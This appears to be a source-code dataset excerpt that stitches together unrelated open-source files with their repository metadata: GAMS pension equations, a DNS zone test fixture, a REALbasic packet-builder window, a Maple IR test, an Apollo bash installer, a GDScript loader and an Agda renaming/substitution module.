t.val > 2015).. rPensIndb[pens,aTot,t] * vWHh[aTot,t] =E= sum(a, vPensIndb[pens,a,t] * nPop[a,t]); # Pensionsudbetalinger til levende og døde E_vPensUdb[pens,a,t]$(a15t100[a] and tx0[t] and t.val > 2015).. vPensUdb[pens,a,t] * (1-rPensUdb[pens,a,t]) =E= rPensUdb[pens,a,t] * vHh[pens,a,t]; E_vPensArv[pens,a,t]$(a.val >= 15 and tx0[t] and t.val > 2015).. vPensArv[pens,a,t] =E= rPensArv[pens,a,t] * (vHh[pens,a-1,t-1]/fv + vHhPensAfk[pens,a,t]); E_vPensArv_aTot[pens,t]$(tx0[t] and t.val > 2015).. vPensArv[pens,aTot,t] =E= sum(a, vPensArv[pens,a,t] * nPop[a-1,t-1] * (1-rOverlev[a-1,t-1])); E_vPensUdb_aTot[pens,t]$(tx0[t] and t.val > 2015).. vPensUdb[pens,aTot,t] * (1-rPensUdb[pens,aTot,t]) =E= rPensUdb[pens,aTot,t] * vHh[pens,aTot,t]; E_rPensUdb_aTot[pens,t]$(tx0[t] and not (sameas['Alder',pens] and t.val < 2014) and t.val > 2015).. # Alderspensionen eksisterer først fra 2013 og frem vPensUdb[pens,aTot,t] =E= sum(a, vPensUdb[pens,a,t] * nPop[a,t]) + vPensArv[pens,aTot,t]; E_vHh_pension[a,t]$(a15t100[a] and tx0[t] and t.val > 2015).. vHh['Pens',a,t] =E= sum(pens, vHh[pens,a,t]); E_vHh_pension_aTot[t]$(tx0[t] and t.val > 2015).. vHh['Pens',aTot,t] =E= sum(pens, vHh[pens,aTot,t]); E_vPensIndb_pension[a,t]$(a15t100[a] and tx0[t] and t.val > 2015).. vPensIndb['Pens',a,t] =E= sum(pens, vPensIndb[pens,a,t]); E_vPensIndb_pension_aTot[t]$(tx0[t] and t.val > 2015).. vPensIndb['Pens',aTot,t] =E= sum(pens, vPensIndb[pens,aTot,t]); E_vPensUdb_pension[a,t]$(a15t100[a] and tx0[t] and t.val > 2015).. vPensUdb['Pens',a,t] =E= sum(pens, vPensUdb[pens,a,t]); E_vPensUdb_pension_aTot[t]$(tx0[t] and t.val > 2015).. vPensUdb['Pens',aTot,t] =E= sum(pens, vPensUdb[pens,aTot,t]); E_vPensArv_pension[a,t]$(a.val >= 15 and tx0[t] and t.val > 2015).. vPensArv['Pens',a,t] =E= sum(pens, vPensArv[pens,a,t]); E_vPensArv_pension_aTot[t]$(tx0[t] and t.val > 2015).. vPensArv['Pens',aTot,t] =E= sum(pens, vPensArv[pens,aTot,t]); E_vHhPensAfk_pension[a,t]$(a.val >= 15 and tx0[t] and t.val > 2015).. vHhPensAfk['Pens',a,t] =E= sum(pens, vHhPensAfk[pens,a,t]); E_vHhPensAfk_pension_aTot[t]$(tx0[t] and t.val > 2015).. vHhPensAfk['Pens',aTot,t] =E= sum(pens, vHhPensAfk[pens,aTot,t]); # vHhx opdeles i aktiver og bankgæld E_vHh_BankGaeld[a,t]$(tx0[t] and t.val > 2015).. vHh['BankGaeld',a,t] =E= vHhFinAkt[a,t] - vHhx[a,t]; E_vHh_BankGaeld_aTot[t]$(tx0[t]).. vHh['BankGaeld',aTot,t] =E= vHhFinAkt[aTot,t] - vHhx[aTot,t]; # Financial assets are split into portfolio: vHhFinAkt = vHhIndlAktier + vHhUdlAktier + vHhObl + vHhbanks E_vHhFinAkt[a,t]$(tx0[t] and t.val > 2015).. vHhFinAkt[a,t] =E= vHh['Bank',a,t] + vHh['IndlAktier',a,t] + vHh['UdlAktier',a,t] + vHh['obl',a,t]; E_vHhFinAkt_aTot[t]$(tx0[t]).. vHhFinAkt[aTot,t] =E= vHh['Bank',aTot,t] + vHh['IndlAktier',aTot,t] + vHh['UdlAktier',aTot,t] + vHh['obl',aTot,t]; E_vHh_akt[akt,a,t]$(tx0[t] and fin_akt[akt] and t.val > 2015).. vHh[akt,a,t] =E= (cHh_a[akt,a,t] + cHh_t[akt,t]) * vBVT2hLsnit[t] + dvHh2dvHhx[akt,t] * vHhx[a,t] + dvHh2dvBolig[akt,t] * (vHhx[aTot,t]/vBolig[aTot,t]) * pBoligRigid[a,t] * qBoligR[a,t] + dvHh2dvPensIndb[akt,t] * vHhx[aTot,t]/vPensIndb['Pens',aTot,t] * vPensIndb['Pens',a,t]; E_vHh_aTot[akt,t]$(tx0[t] and fin_akt[akt] and t.val > 2015).. vHh[akt,aTot,t] =E= sum(a, vHh[akt,a,t] * nPop[a,t]); E_vHhNFE[t]$(tx0[t]).. vHhNFE[t] =E= vHh['NetFin',aTot,t] - vHh['NetFin',aTot,t-1]/fv - vHhOmv['NetFin',t]; $ENDBLOCK $ENDIF
GAMS
5
gemal/MAKRO
Model/HHincome.gms
[ "MIT" ]
$TTL 300 @ IN A 60.19.19.19 bar IN A 60.21.21.21 baz.bar IN A 60.23.23.23 www.baz.bar IN A 60.24.24.24 www.bar IN A 60.22.22.22 www IN A 60.20.20.20
DNS Zone
1
hosting-de-labs/dnscontrol
pkg/js/parse_tests/029-dextendsub/foo.here.zone
[ "MIT" ]
#tag Window Begin Window PacketBuilderWindow BackColor = &hFFFFFF Backdrop = "" CloseButton = True Composite = False Frame = 0 FullScreen = False HasBackColor = False Height = 300 ImplicitInstance= True LiveResize = True MacProcID = 0 MaxHeight = 32000 MaximizeButton = False MaxWidth = 32000 MenuBar = "" MenuBarVisible = True MinHeight = 300 MinimizeButton = True MinWidth = 800 Placement = 3 Resizeable = True Title = "Packet Builder" Visible = True Width = 8.0e+2 Begin GroupBox grpPacket AutoDeactivate = True Bold = True Caption = "Packet" Enabled = True Height = 266 HelpTag = "" Index = -2147483648 InitialParent = "" Italic = "" Left = 16 LockBottom = True LockedInPosition= False LockLeft = True LockRight = "" LockTop = True Scope = 0 TabIndex = 0 TabPanelIndex = 0 TextFont = "Arial" TextSize = 12 TextUnit = 0 Top = 16 Underline = "" Visible = True Width = 412 Begin Listbox FieldList AutoDeactivate = True AutoHideScrollbars= True Bold = "" Border = True ColumnCount = 4 ColumnsResizable= True ColumnWidths = 30,80,50 DataField = "" DataSource = "" DefaultRowHeight= 16 Enabled = True EnableDrag = True EnableDragReorder= True GridLinesHorizontal= 0 GridLinesVertical= 0 HasHeading = True HeadingIndex = -1 Height = 176 HelpTag = "" Hierarchical = "" Index = -2147483648 InitialParent = "grpPacket" InitialValue = "# Data Type Bytes Description" Italic = "" Left = 32 LockBottom = True LockedInPosition= False LockLeft = True LockRight = True LockTop = True RequiresSelection= "" Scope = 0 ScrollbarHorizontal= "" ScrollBarVertical= True SelectionType = 0 TabIndex = 7 TabPanelIndex = 0 TabStop = True TextFont = "Arial" TextSize = 12 TextUnit = 0 Top = 88 Underline = "" UseFocusRing = True Visible = True Width = 380 _ScrollWidth = -1 Begin Timer FieldsTimer Height = 32 Index = -2147483648 InitialParent = "FieldList" Left = 64 LockedInPosition= False Mode = 1 Period = 5 Scope = 0 TabPanelIndex = 0 Top = 120 Width = 32 End End Begin Label txtJunk AutoDeactivate = True Bold = True DataField = "" DataSource = "" Enabled = True Height = 18 HelpTag = "" Index = 0 InitialParent = "grpPacket" Italic = "" Left = 32 LockBottom = "" LockedInPosition= False LockLeft = True LockRight = True LockTop = True Multiline = "" Scope = 0 Selectable = False TabIndex = 6 TabPanelIndex = 0 Text = "Fields:" TextAlign = 0 TextColor = &h000000 TextFont = "Arial" TextSize = 12 TextUnit = 0 Top = 70 Transparent = True Underline = "" Visible = True Width = 380 End Begin Label txtJunk AutoDeactivate = True Bold = True DataField = "" DataSource = "" Enabled = True Height = 18 HelpTag = "" Index = 4 InitialParent = "grpPacket" Italic = "" Left = 32 LockBottom = "" LockedInPosition= False LockLeft = True LockRight = False LockTop = True Multiline = "" Scope = 0 Selectable = False TabIndex = 0 TabPanelIndex = 0 Text = "Id:" TextAlign = 2 TextColor = &h000000 TextFont = "Arial" TextSize = 12 TextUnit = 0 Top = 40 Transparent = True Underline = "" Visible = True Width = 14 End Begin TextField FieldId AcceptTabs = "" Alignment = 0 AutoDeactivate = True AutomaticallyCheckSpelling= False BackColor = &hFFFFFF Bold = "" Border = True CueText = "" DataField = "" DataSource = "" Enabled = True Format = "" Height = 22 HelpTag = "" Index = -2147483648 InitialParent = "grpPacket" Italic = "" Left = 54 LimitText = 0 LockBottom = "" LockedInPosition= False LockLeft = True LockRight = False LockTop = True Mask = "" Password = "" ReadOnly = "" Scope = 0 TabIndex = 1 TabPanelIndex = 0 TabStop = True Text = 0 TextColor = &h000000 TextFont = "Arial" TextSize = 12 TextUnit = 0 Top = 38 Underline = "" UseFocusRing = True Visible = True Width = 90 End Begin UpDownArrows FieldIdUpDownArrows AcceptFocus = True AutoDeactivate = True Enabled = True Height = 23 HelpTag = "" Index = -2147483648 InitialParent = "grpPacket" Left = 148 LockBottom = "" LockedInPosition= False LockLeft = True LockRight = "" LockTop = True Scope = 0 TabIndex = 2 TabPanelIndex = 0 TabStop = True Top = 38 Visible = True Width = 13 End Begin Label txtJunk AutoDeactivate = True Bold = True DataField = "" DataSource = "" Enabled = True Height = 18 HelpTag = "" Index = 5 InitialParent = "grpPacket" Italic = "" Left = 172 LockBottom = "" LockedInPosition= False LockLeft = True LockRight = False LockTop = True Multiline = "" Scope = 0 Selectable = False TabIndex = 3 TabPanelIndex = 0 Text = "Hex:" TextAlign = 2 TextColor = &h000000 TextFont = "Arial" TextSize = 12 TextUnit = 0 Top = 40 Transparent = True Underline = "" Visible = True Width = 26 End Begin Label HexIdText AutoDeactivate = True Bold = False DataField = "" DataSource = "" Enabled = True Height = 18 HelpTag = "" Index = -2147483648 InitialParent = "grpPacket" Italic = "" Left = 206 LockBottom = "" LockedInPosition= False LockLeft = True LockRight = False LockTop = True Multiline = "" Scope = 0 Selectable = False TabIndex = 4 TabPanelIndex = 0 Text = "0x00" TextAlign = 0 TextColor = &h000000 TextFont = "Arial" TextSize = 12 TextUnit = 0 Top = 40 Transparent = True Underline = "" Visible = True Width = 30 End Begin PushButton SendButton AutoDeactivate = True Bold = "" ButtonStyle = 0 Cancel = "" Caption = "&Send" Default = "" Enabled = True Height = 24 HelpTag = "" Index = -2147483648 InitialParent = "grpPacket" Italic = "" Left = 322 LockBottom = False LockedInPosition= False LockLeft = False LockRight = True LockTop = True Scope = 0 TabIndex = 5 TabPanelIndex = 0 TabStop = True TextFont = "Arial" TextSize = 12 TextUnit = 0 Top = 37 Underline = "" Visible = True Width = 90 End End Begin GroupBox grpField AutoDeactivate = True Bold = True Caption = "Field" Enabled = True Height = 266 HelpTag = "" Index = -2147483648 InitialParent = "" Italic = "" Left = 440 LockBottom = True LockedInPosition= False LockLeft = True LockRight = True LockTop = True Scope = 0 TabIndex = 1 TabPanelIndex = 0 TextFont = "Arial" TextSize = 12 TextUnit = 0 Top = 16 Underline = "" Visible = True Width = 340 Begin Label txtJunk AutoDeactivate = True Bold = True DataField = "" DataSource = "" Enabled = True Height = 18 HelpTag = "" Index = 1 InitialParent = "grpField" Italic = "" Left = 454 LockBottom = "" LockedInPosition= False LockLeft = True LockRight = False LockTop = True Multiline = "" Scope = 0 Selectable = False TabIndex = 0 TabPanelIndex = 0 Text = "Data Type:" TextAlign = 2 TextColor = &h000000 TextFont = "Arial" TextSize = 12 TextUnit = 0 Top = 40 Transparent = True Underline = "" Visible = True Width = 70 End Begin PopupMenu FieldTypeMenu AutoDeactivate = True Bold = "" DataField = "" DataSource = "" Enabled = False Height = 22 HelpTag = "" Index = -2147483648 InitialParent = "grpField" InitialValue = "INT8\r\nINT16\r\nINT32\r\nINT64\r\nSTRING\r\nUINT8\r\nUINT16\r\nUINT32\r\nUINT64\r\n" Italic = "" Left = 532 ListIndex = -1 LockBottom = "" LockedInPosition= False LockLeft = True LockRight = True LockTop = True Scope = 0 TabIndex = 1 TabPanelIndex = 0 TabStop = True TextFont = "Arial" TextSize = 12 TextUnit = 0 Top = 38 Underline = "" Visible = True Width = 224 End Begin Label txtJunk AutoDeactivate = True Bold = True DataField = "" DataSource = "" Enabled = True Height = 18 HelpTag = "" Index = 2 InitialParent = "grpField" Italic = "" Left = 454 LockBottom = "" LockedInPosition= False LockLeft = True LockRight = False LockTop = True Multiline = "" Scope = 0 Selectable = False TabIndex = 2 TabPanelIndex = 0 Text = "Description:" TextAlign = 2 TextColor = &h000000 TextFont = "Arial" TextSize = 12 TextUnit = 0 Top = 70 Transparent = True Underline = "" Visible = True Width = 70 End Begin TextField FieldDescription AcceptTabs = "" Alignment = 0 AutoDeactivate = True AutomaticallyCheckSpelling= False BackColor = &hFFFFFF Bold = "" Border = True CueText = "" DataField = "" DataSource = "" Enabled = False Format = "" Height = 22 HelpTag = "" Index = -2147483648 InitialParent = "grpField" Italic = "" Left = 532 LimitText = 0 LockBottom = "" LockedInPosition= False LockLeft = True LockRight = True LockTop = True Mask = "" Password = "" ReadOnly = "" Scope = 0 TabIndex = 3 TabPanelIndex = 0 TabStop = True Text = "" TextColor = &h000000 TextFont = "Arial" TextSize = 12 TextUnit = 0 Top = 68 Underline = "" UseFocusRing = True Visible = True Width = 224 End Begin Label txtJunk AutoDeactivate = True Bold = True DataField = "" DataSource = "" Enabled = True Height = 18 HelpTag = "" Index = 3 InitialParent = "grpField" Italic = "" Left = 454 LockBottom = "" LockedInPosition= False LockLeft = True LockRight = False LockTop = True Multiline = "" Scope = 0 Selectable = False TabIndex = 4 TabPanelIndex = 0 Text = "Data:" TextAlign = 2 TextColor = &h000000 TextFont = "Arial" TextSize = 12 TextUnit = 0 Top = 100 Transparent = True Underline = "" Visible = True Width = 70 End Begin TextArea FieldText AcceptTabs = True Alignment = 0 AutoDeactivate = True AutomaticallyCheckSpelling= True BackColor = &hFFFFFF Bold = "" Border = True DataField = "" DataSource = "" Enabled = False Format = "" Height = 136 HelpTag = "" HideSelection = True Index = -2147483648 InitialParent = "grpField" Italic = "" Left = 532 LimitText = 0 LineHeight = 0 LineSpacing = 1 LockBottom = True LockedInPosition= False LockLeft = True LockRight = True LockTop = True Mask = "" Multiline = True ReadOnly = "" Scope = 0 ScrollbarHorizontal= False ScrollbarVertical= True Styled = True TabIndex = 5 TabPanelIndex = 0 TabStop = True Text = "" TextColor = &h000000 TextFont = "Courier New" TextSize = 12 TextUnit = 0 Top = 98 Underline = "" UseFocusRing = True Visible = True Width = 224 End Begin PushButton NewFieldButton AutoDeactivate = True Bold = "" ButtonStyle = 0 Cancel = "" Caption = "&New Field" Default = "" Enabled = True Height = 24 HelpTag = "" Index = -2147483648 InitialParent = "grpField" Italic = "" Left = 666 LockBottom = True LockedInPosition= False LockLeft = False LockRight = True LockTop = False Scope = 0 TabIndex = 6 TabPanelIndex = 0 TabStop = True TextFont = "Arial" TextSize = 12 TextUnit = 0 Top = 242 Underline = "" Visible = True Width = 90 End Begin PushButton DeleteFieldButton AutoDeactivate = True Bold = "" ButtonStyle = 0 Cancel = "" Caption = "Delete Field" Default = "" Enabled = False Height = 24 HelpTag = "" Index = -2147483648 InitialParent = "grpField" Italic = "" Left = 568 LockBottom = True LockedInPosition= False LockLeft = False LockRight = True LockTop = False Scope = 0 TabIndex = 7 TabPanelIndex = 0 TabStop = True TextFont = "Arial" TextSize = 12 TextUnit = 0 Top = 242 Underline = "" Visible = True Width = 90 End End End #tag EndWindow #tag WindowCode #tag Property, Flags = &h0 Config As Configuration #tag EndProperty #tag EndWindowCode #tag Events FieldList #tag Event Sub Change() If Me.ListIndex < 0 Then DeleteFieldButton.Enabled = False FieldTypeMenu.Enabled = False FieldDescription.Enabled = False FieldText.Enabled = False FieldTypeMenu.ListIndex = -1 FieldDescription.Text = "" FieldText.Text = "" Else DeleteFieldButton.Enabled = True FieldTypeMenu.Enabled = True FieldDescription.Enabled = True FieldText.Enabled = True For i As Integer = 0 To FieldTypeMenu.ListCount - 1 If FieldTypeMenu.List( i ) = Me.Cell( Me.ListIndex, 1 ) Then FieldTypeMenu.ListIndex = i Exit For End If Next FieldDescription.Text = Me.Cell( Me.ListIndex, 3 ) FieldText.Text = Me.CellTag( Me.ListIndex, 0 ) End If End Sub #tag EndEvent #tag Event Function DragReorderRows(newPosition as Integer, parentRow as Integer) As Boolean #pragma Unused newPosition #pragma Unused parentRow FieldsTimer.Reset() Return False End Function #tag EndEvent #tag EndEvents #tag Events FieldsTimer #tag Event Sub Action() For i As Integer = 0 To FieldList.ListCount - 1 FieldList.Cell(i, 0) = Format(i, "-#") Next End Sub #tag EndEvent #tag EndEvents #tag Events FieldId #tag Event Sub LostFocus() Dim v As Double = Val(Me.Text) If v < 0 Then v = 0 If v > 255 Then v = 255 Me.Text = Format(v, "-#") HexIdText.Text = "0x" + Right( "0" + Hex(v), 2 ) End Sub #tag EndEvent #tag EndEvents #tag Events FieldIdUpDownArrows #tag Event Sub Up() Dim v As Double = Val( FieldId.Text ) + 1 If v < 0 Then v = 0 If v > 255 Then v = 255 FieldId.Text = Format(v, "-#") HexIdText.Text = "0x" + Right( "0" + Hex(v), 2 ) End Sub #tag EndEvent #tag Event Sub Down() Dim v As Double = Val( FieldId.Text ) - 1 If v < 0 Then v = 0 If v > 255 Then v = 255 FieldId.Text = Format(v, "-#") HexIdText.Text = "0x" + Right( "0" + Hex(v), 2 ) End Sub #tag EndEvent #tag EndEvents #tag Events SendButton #tag Event Sub Action() Call MsgBox("NYI", 48, "Error") End Sub #tag EndEvent #tag EndEvents #tag Events NewFieldButton #tag Event Sub Action() FieldList.InsertRow(FieldList.ListIndex + 1, "#") FieldList.Cell(FieldList.LastIndex, 1) = "STRING" FieldList.Cell(FieldList.LastIndex, 2) = "1" FieldList.Cell(FieldList.LastIndex, 3) = "Untitled" For i As Integer = 0 To FieldList.ListCount - 1 FieldList.Cell(i, 0) = Format(i, "-#") Next End Sub #tag EndEvent #tag EndEvents #tag Events DeleteFieldButton #tag Event Sub Action() If FieldList.ListIndex = -1 Then Me.Enabled = False Return End If If FieldList.ListIndex = 0 And FieldList.ListCount > 1 Then FieldList.ListIndex = FieldList.ListIndex + 1 FieldList.RemoveRow( FieldList.ListIndex - 1 ) Else FieldList.ListIndex = FieldList.ListIndex - 1 FieldList.RemoveRow(FieldList.ListIndex + 1) End If End Sub #tag EndEvent #tag EndEvents
REALbasic
4
carlbennett/BNRBot
src/Windows/PacketBuilderWindow.rbfrm
[ "MIT" ]
type $__field_meta__ <struct { @fieldname i32, @offset i32, @declaringclass <* void>, @type <* void>}> var $v1 <* void> public var $v2 <* void> public var $vs <[1] <$__field_meta__>> public = [[1= 0x35ad1b, 2= 0xabcd, 3= addrof ptr $v2, 4= addrof ptr $v1]] var $vvs <[2][1] <$__field_meta__>> public = [[[1= 11, 2= 22, 3= addrof ptr $v1, 4= addrof ptr $v1]], [[1= 33, 2= 44, 3= addrof ptr $v2, 4= addrof ptr $v2]]] # EXEC: %irbuild Main.mpl # EXEC: %irbuild Main.irb.mpl # EXEC: %cmp Main.irb.mpl Main.irb.irb.mpl
Maple
1
harmonyos-mirror/OpenArkCompiler-test
test/testsuite/irbuild_test/I0070-mapleall-irbuild-edge-structarrayinit/Main.mpl
[ "MulanPSL-1.0" ]
#!/usr/bin/env bash ############################################################################### # Copyright 2020 The Apollo Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. ############################################################################### # Fail on first error. set -e BUILD_TYPE="${1:-download}" CURR_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd -P)" . ${CURR_DIR}/installer_base.sh # freeglut3-dev # libgl1-mesa-dev # libegl1-mesa-dev # libgles2-mesa-dev apt_get_update_and_install \ mesa-common-dev \ libglvnd-dev \ libxcb1-dev # See Ref: # https://hub.docker.com/r/nvidia/cudagl # https://gitlab.com/nvidia/container-images/opengl/blob/ubuntu18.04/glvnd/devel/Dockerfile # https://www.pugetsystems.com/labs/hpc/NVIDIA-Docker2-with-OpenGL-and-X-Display-Output-1527/ # DON'T INSTALL THESE!!! # libnvidia-gl-440 # trouble-maker for `nvidia-smi` bash ${CURR_DIR}/install_qt.sh "${BUILD_TYPE}" # Clean up cache to reduce layer size. apt-get clean && \ rm -rf /var/lib/apt/lists/*
Shell
3
jzjonah/apollo
docker/build/installers/install_visualizer_deps.sh
[ "Apache-2.0" ]
extends Node2D func _on_switch_pressed(): $CanvasLayer/Switch.hide() background_load.load_scene("res://sculptures.tscn")
GDScript
3
jonbonazza/godot-demo-projects
loading/background_load/paintings.gd
[ "MIT" ]
\begin{code} module Algorithmic.RenamingSubstitution where \end{code} ## Imports \begin{code} open import Function using (id; _∘_) open import Relation.Binary.PropositionalEquality renaming (subst to substEq; [_] to [_]≅) open import Data.Sum open import Data.List hiding ([_]) open import Data.Product renaming (_,_ to _,,_) open import Utils hiding (TermCon) open import Type open import Type.Equality import Type.RenamingSubstitution as ⋆ --open import Type.Reduction open import Type.BetaNormal open import Type.BetaNBE open import Type.BetaNBE.Soundness open import Type.BetaNBE.Completeness open import Type.BetaNBE.RenamingSubstitution open import Algorithmic open import Builtin.Constant.Term Ctx⋆ Kind * _⊢Nf⋆_ con open import Type.BetaNormal.Equality \end{code} ## Renaming \begin{code} Ren : ∀{Φ Ψ} → ⋆.Ren Φ Ψ → Ctx Φ → Ctx Ψ → Set Ren ρ⋆ Γ Δ = {A : _ ⊢Nf⋆ *} → Γ ∋ A → Δ ∋ renNf ρ⋆ A ext : ∀ {Φ Ψ Γ Δ} → (ρ⋆ : ⋆.Ren Φ Ψ) → (ρ : Ren ρ⋆ Γ Δ) → {B : Φ ⊢Nf⋆ *} ------------------------------- → Ren ρ⋆ (Γ , B) (Δ , renNf ρ⋆ B) ext ρ⋆ ρ Z = Z ext ρ⋆ ρ (S x) = S (ρ x) \end{code} \begin{code} ext⋆ : ∀ {Φ Ψ Γ Δ} → (ρ⋆ : ⋆.Ren Φ Ψ) → (ρ : Ren ρ⋆ Γ Δ) → ∀ {K} -------------------------------- → Ren (⋆.ext ρ⋆) (Γ ,⋆ K) (Δ ,⋆ K) ext⋆ ρ⋆ ρ (T {A = A} x) = conv∋ refl (weakenNf-renNf ρ⋆ A) (T (ρ x)) \end{code} \begin{code} renTermCon : ∀ {Φ Ψ} → (ρ⋆ : ⋆.Ren Φ Ψ) ----------------------------------------------------- → ({A : Φ ⊢Nf⋆ *} → TermCon A → TermCon (renNf ρ⋆ A )) renTermCon ρ⋆ (integer i) = integer i renTermCon ρ⋆ (bytestring b) = bytestring b renTermCon ρ⋆ (string s) = string s renTermCon ρ⋆ (bool b) = bool b renTermCon ρ⋆ unit = unit renTermCon ρ⋆ (Data d) = Data d \end{code} \begin{code} ren : ∀ {Φ Ψ Γ Δ} → (ρ⋆ : ⋆.Ren Φ Ψ) → (ρ : Ren ρ⋆ Γ Δ) ----------------------------------------- → ({A : Φ ⊢Nf⋆ *} → Γ ⊢ A → Δ ⊢ renNf ρ⋆ A ) ren ρ⋆ ρ (` x) = ` (ρ x) ren ρ⋆ ρ (ƛ N) = ƛ (ren ρ⋆ (ext ρ⋆ ρ) N) ren ρ⋆ ρ (L · M) = ren ρ⋆ ρ L · ren ρ⋆ ρ M ren ρ⋆ ρ (Λ N) = Λ (ren (⋆.ext ρ⋆) (ext⋆ ρ⋆ ρ) N) ren ρ⋆ ρ (_·⋆_/_ {B = B} t A refl) = conv⊢ refl (sym (ren[]Nf ρ⋆ B A)) (ren ρ⋆ ρ t ·⋆ renNf ρ⋆ A / refl) ren ρ⋆ ρ (wrap A B M) = wrap (renNf ρ⋆ A) (renNf ρ⋆ B) (conv⊢ refl (ren-nf-μ ρ⋆ A B) (ren ρ⋆ ρ M)) ren ρ⋆ ρ (unwrap {A = A}{B} M refl) = conv⊢ refl (sym (ren-nf-μ ρ⋆ A B)) (unwrap (ren ρ⋆ ρ M) refl) ren ρ⋆ ρ (con c) = con (renTermCon ρ⋆ c) ren ρ⋆ ρ (builtin b / refl) = conv⊢ refl (btype-ren b ρ⋆) (builtin b / refl) ren ρ⋆ ρ (error A) = error (renNf ρ⋆ A) \end{code} \begin{code} weaken : ∀ {Φ Γ}{A : Φ ⊢Nf⋆ *}{B : Φ ⊢Nf⋆ *} → Γ ⊢ A --------- → Γ , B ⊢ A weaken t = conv⊢ refl (renNf-id _) (ren id (conv∋ refl (sym (renNf-id _)) ∘ S) t) \end{code} \begin{code} weaken⋆ : ∀ {Φ Γ}{A : Φ ⊢Nf⋆ *}{K} → Γ ⊢ A ------------------ → Γ ,⋆ K ⊢ weakenNf A weaken⋆ t = ren S (λ α → _∋_.T α) t \end{code} ## Substitution \begin{code} Sub : ∀{Φ Ψ} → SubNf Φ Ψ → Ctx Φ → Ctx Ψ → Set Sub σ⋆ Γ Δ = (∀ {A : _ ⊢Nf⋆ *} → Γ ∋ A → Δ ⊢ subNf σ⋆ A) exts : ∀ {Φ Ψ Γ Δ} → (σ⋆ : SubNf Φ Ψ) → (σ : Sub σ⋆ Γ Δ) → {B : Φ ⊢Nf⋆ *} --------------------------------- → Sub σ⋆ (Γ , B) (Δ , subNf σ⋆ B) exts σ⋆ σ Z = ` Z exts σ⋆ σ (S α) = weaken (σ α) \end{code} \begin{code} exts⋆ : ∀ {Φ Ψ Γ Δ} → (σ⋆ : SubNf Φ Ψ) → (σ : Sub σ⋆ Γ Δ) → ∀ {K} -------------------------------- → Sub (extsNf σ⋆) (Γ ,⋆ K) (Δ ,⋆ K) exts⋆ σ⋆ σ {K}(T {A = A} x) = conv⊢ refl (weakenNf-subNf σ⋆ A) (weaken⋆ (σ x)) \end{code} \begin{code} subTermCon : ∀ {Φ Ψ} → (σ⋆ : SubNf Φ Ψ) ------------------------------------------------------ → ({A : Φ ⊢Nf⋆ *} → TermCon A → TermCon (subNf σ⋆ A )) subTermCon σ⋆ (integer i) = integer i subTermCon σ⋆ (bytestring b) = bytestring b subTermCon σ⋆ (string s) = string s subTermCon σ⋆ (bool b) = bool b subTermCon σ⋆ unit = unit subTermCon σ⋆ (Data d) = Data d \end{code} \begin{code} sub : ∀ {Φ Ψ Γ Δ} → (σ⋆ : SubNf Φ Ψ) → (σ : Sub σ⋆ Γ Δ) ------------------------------------------- → ({A : Φ ⊢Nf⋆ *} → Γ ⊢ A → Δ ⊢ subNf σ⋆ A) sub σ⋆ σ (` k) = σ k sub σ⋆ σ (ƛ N) = ƛ (sub σ⋆ (exts σ⋆ σ) N) sub σ⋆ σ (L · M) = sub σ⋆ σ L · sub σ⋆ σ M sub σ⋆ σ (Λ {B = B} N) = Λ (conv⊢ refl (sub-nf-Π σ⋆ B) (sub (extsNf σ⋆) (exts⋆ σ⋆ σ) N)) sub σ⋆ σ (_·⋆_/_ {B = B} L M refl) = conv⊢ refl (sym (sub[]Nf' σ⋆ M B)) (sub σ⋆ σ L ·⋆ subNf σ⋆ M / refl) sub σ⋆ σ (wrap A B M) = wrap (subNf σ⋆ A) (subNf σ⋆ B) (conv⊢ refl (sub-nf-μ σ⋆ A B) (sub σ⋆ σ M)) sub σ⋆ σ (unwrap {A = A}{B} M refl) = conv⊢ refl (sym (sub-nf-μ σ⋆ A B)) (unwrap (sub σ⋆ σ M) refl) sub σ⋆ σ (con c) = con (subTermCon σ⋆ c) sub σ⋆ σ (builtin b / refl) = conv⊢ refl (btype-sub b σ⋆) (builtin b / refl) sub σ⋆ σ (error A) = error (subNf σ⋆ A) \end{code} \begin{code} subcons : ∀{Φ Ψ Γ Δ} → (σ⋆ : SubNf Φ Ψ) → (σ : Sub σ⋆ Γ Δ) → {A : Φ ⊢Nf⋆ *} → (t : Δ ⊢ subNf σ⋆ A) --------------------- → (∀ {B : Φ ⊢Nf⋆ *} → Γ , A ∋ B → Δ ⊢ subNf σ⋆ B) subcons σ⋆ σ t Z = t subcons σ⋆ σ t (S x) = σ x \end{code} \begin{code} _[_] : ∀{Φ Γ}{A B : Φ ⊢Nf⋆ *} → Γ , B ⊢ A → Γ ⊢ B ----- → Γ ⊢ A _[_] {A = A}{B} b a = conv⊢ refl (subNf-id A) (sub ( ne ∘ `) (subcons (ne ∘ `) (conv⊢ refl (sym (subNf-id _)) ∘ `) (conv⊢ refl (sym (subNf-id B)) a)) b) \end{code} \begin{code} lem : ∀ {Φ Γ K} {B : Φ ,⋆ K ⊢Nf⋆ *}{A : Φ ⊢Nf⋆ K} → (x : Γ ,⋆ K ∋ B) → Γ ⊢ subNf (subNf-cons (λ x₁ → ne (` x₁)) A) B lem (T x) = conv⊢ refl (weakenNf[] _ _) (` x) _[_]⋆ : ∀ {Φ Γ K} {B : Φ ,⋆ K ⊢Nf⋆ *} → Γ ,⋆ K ⊢ B → (A : Φ ⊢Nf⋆ K) --------- → Γ ⊢ B [ A ]Nf _[_]⋆ b A = sub (subNf-cons (ne ∘ `) A) lem b \end{code} # simply typed renaming These are easier to reason about and show up in the CEK machine as discharge is simply typed. Fully general rens/subs reasoning easily gets bogged down with type coercions. Note: This doesn't scale to substitution as we need to weaken by a type var to go under a Λ. \begin{code} Renˢ : ∀{Φ} → Ctx Φ → Ctx Φ → Set Renˢ Γ Δ = ∀{A} → Γ ∋ A → Δ ∋ A extˢ : ∀ {Φ Γ Δ} → (ρ : Renˢ Γ Δ) → {B : Φ ⊢Nf⋆ *} ------------------------------- → Renˢ (Γ , B) (Δ , B) extˢ ρ Z = Z extˢ ρ (S x) = S (ρ x) -- here we are manipulating the type contexts of the renaming but only -- by extending them with the same kind extˢ⋆ : ∀{Φ}{Γ Δ : Ctx Φ} → (ρ : Renˢ Γ Δ) → ∀ {K} ---------------------- → Renˢ (Γ ,⋆ K) 